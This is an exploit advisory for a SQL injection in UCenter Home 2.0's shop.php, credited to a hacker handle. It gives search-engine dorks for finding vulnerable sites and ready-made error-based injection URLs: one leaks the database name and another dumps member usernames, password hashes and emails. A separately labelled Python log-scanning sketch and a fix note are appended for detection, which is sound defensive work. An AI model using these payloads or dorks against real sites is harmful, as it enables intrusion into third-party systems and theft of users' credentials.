__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home

Version : 2.0

Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view

Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php

Values : (?)ac=view&shopid=

Vulnerability Type : SQL Injection (MySQL Error Based)

Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
You need the victim database name.

For Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okey.

Edit the DB name: `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okey.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
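
Detection sketch for the requests described above, added here as an example and not part of the original advisory: it scans web access logs for shop.php?ac=view requests whose shopid is not a plain integer and marks the floor(rand()) error-based pattern separately. It assumes combined-format logs and that a legitimate shopid is numeric (as in shopid=253); the log lines, function names and verdict labels are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from'
    '(select%20count(*),concat(0x7e,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)'
    ' HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /shop.php?ac=view&shopid=253%27 HTTP/1.1" 200 790',
    '192.0.2.11 - - [01/Jan/2024:10:00:12 +0000] "GET /space.php?uid=4 HTTP/1.1" 200 3000',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# floor(rand(...)) grouped over a table is the duplicate-key trick behind error-based extraction.
ERROR_BASED = re.compile(r"floor\s*\(\s*rand\s*\(", re.I)
SQL_TOKENS = re.compile(r"\b(select|union|concat|information_schema)\b", re.I)

def classify_shopid(url):
    """Classify one request URL; returns None for anything other than shop.php?ac=view."""
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if not parts.path.lower().endswith("/shop.php") or query.get("ac") != ["view"]:
        return None
    value = " ".join(query.get("shopid", [""]))
    if value.isascii() and value.isdigit():
        return "ok"                 # assumption: a legitimate shop id is a plain integer
    if ERROR_BASED.search(value):
        return "sqli-error-based"
    if SQL_TOKENS.search(value):
        return "sqli"
    return "non-integer"            # quotes, operators, anything that is not digits

def scan(lines):
    """Return (client, verdict) for every suspicious shop.php request."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        verdict = classify_shopid(m.group(2)) if m else None
        if verdict not in (None, "ok"):
            hits.append((m.group(1), verdict))
    return hits

if __name__ == "__main__":
    for client, verdict in scan(SAMPLE_LOG):
        print(client, verdict)
```

The same integer-only assumption is the server-side fix: a shopid that is cast to an integer or bound as a query parameter never reaches the SQL parser as text.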